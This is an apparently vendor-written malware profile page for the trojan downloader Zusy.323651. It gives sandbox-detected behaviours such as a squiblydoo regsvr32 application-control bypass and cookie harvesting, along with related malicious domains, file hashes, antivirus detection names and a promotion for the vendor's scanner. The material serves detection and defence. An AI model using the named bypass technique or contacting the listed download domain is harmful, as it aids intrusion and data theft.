Categories: Malware

Zusy.323651 malicious file

The Zusy.323651 is considered dangerous by lots of security experts. When this infection is active, you may notice unwanted processes in Task Manager list. In this case, it is adviced to scan your computer with GridinSoft Anti-Malware.

Gridinsoft Anti-Malware

Removing PC viruses manually may take hours and may damage your PC in the process. We recommend using GridinSoft Anti-Malware for virus removal. Allows to complete scan and cure your PC during the trial period.

DOWNLOAD NOW

6-day free trial available.

What Zusy.323651 virus can do?

SetUnhandledExceptionFilter detected (possible anti-debug)
Guard pages use detected – possible anti-debugging.
Dynamic (imported) function loading detected
Performs HTTP requests potentially not found in PCAP.
A HTTP/S link was seen in a script or command line
Authenticode signature is invalid
Uses Windows utilities for basic functionality
RegSvr32 loaded a DLL related the to squiblydoo application control bypass technique
Attempts to bypass application controls using the squiblydoo technique
Harvests cookies for information gathering
Created network traffic indicative of malicious activity
Suspicious wmic.exe use was detected

Related domains:

wpad.local-net

down.cacheoffer.tk

How to determine Zusy.323651?


File Info:
name: F5A747E3EAD7102CAAA2.mlwpath: /opt/CAPEv2/storage/binaries/c2d009c47ea3aa4eef2791bec014f521d269d51a30b6644e93c133012ac8a244crc32: BC3D7F4Fmd5: f5a747e3ead7102caaa23ee272d593d9sha1: 3201ac2c20aae886af461ec8604182063883670esha256: c2d009c47ea3aa4eef2791bec014f521d269d51a30b6644e93c133012ac8a244sha512: 541c04ec37f3fec7bb67cc3f3952086b6f6a8847f7a376c958b4c24ef1b2974303475cade54f61461a8d2471afbb491688769a31ea1f5623e6fd60df2e2c5973ssdeep: 24:etGSIfDhyazgFChZmSW/k+hYhNCNPaZ88ZtSS:6KcQhZDWM+hYh8da1+type: PE32 executable (console) Intel 80386, for MS Windowstlsh: T166511ECB722225F2F12893BD0683DD45E5AD233803D257640F41A4C9D448C1B743AFCBsha3_384: 4be9d2209e185b60c4b66d1d6d9798327dfe7d2471a82f604ba1a6b5241a970eb24eb260f904b6bba2dca5748f221af2ep_bytes: 558bec6a006800304000ff1500204000timestamp: 2018-04-22 20:49:58
Version Info:
0: [No Data]

Zusy.323651 also known as:

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Zusy.323651
FireEye	Generic.mg.f5a747e3ead7102c
ALYac	Gen:Variant.Zusy.323651
Cylance	Unsafe
Zillya	Downloader.Agent.Win64.409
Sangfor	Trojan.Win32.APosT.dcc
K7AntiVirus	Trojan-Downloader ( 0052f8ef1 )
Alibaba	TrojanDownloader:Win32/JbossMiner.4aa44cdf
K7GW	Trojan-Downloader ( 0052f8ef1 )
Cybereason	malicious.3ead71
Cyren	W32/S-ee3b31b2!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win64/TrojanDownloader.Agent.CB
Paloalto	generic.ml
Kaspersky	HEUR:Trojan.Win32.Generic
BitDefender	Gen:Variant.Zusy.323651
NANO-Antivirus	Trojan.Win32.APosT.fasoad
ViRobot	Trojan.Win32.Z.Cerbu.3072.D
Avast	Win32:JbossMiner-C [Trj]
Tencent	Win64.Trojan-downloader.Agent.Edxf
Ad-Aware	Gen:Variant.Zusy.323651
TACHYON	Trojan/W32.APosT.3072.B
Comodo	Malware@#3sjhlcc94n570
DrWeb	Trojan.DownLoader26.42915
VIPRE	Trojan.Win32.Generic!BT
TrendMicro	TROJ_GEN.R002C0PH321
McAfee-GW-Edition	GenericRXFD-SR!F5A747E3EAD7
Emsisoft	Gen:Variant.Zusy.323651 (B)
GData	Gen:Variant.Zusy.323651
Jiangmin	Trojan.APosT.dc
Avira	HEUR/AGEN.1115131
Antiy-AVL	Trojan/Generic.ASMalwS.25E651B
Arcabit	Trojan.Zusy.D4F043
Microsoft	Trojan:Win32/Skeeyah.A!rfn
Cynet	Malicious (score: 99)
AhnLab-V3	Malware/Win32.Generic.C2479368
McAfee	GenericRXFD-SR!F5A747E3EAD7
MAX	malware (ai score=94)
VBA32	Trojan.Downloader
TrendMicro-HouseCall	TROJ_GEN.R002C0PH321
Yandex	Trojan.APosT!Z91N/1zgjZ8
Ikarus	Trojan-Downloader.Win64.Agent
Fortinet	W32/Agent.CB!tr.dldr
BitDefenderTheta	Gen:NN.ZexaF.34294.aqW@au5N5nf
AVG	Win32:JbossMiner-C [Trj]
Panda	Trj/Genetic.gen
CrowdStrike	win/malicious_confidence_100% (W)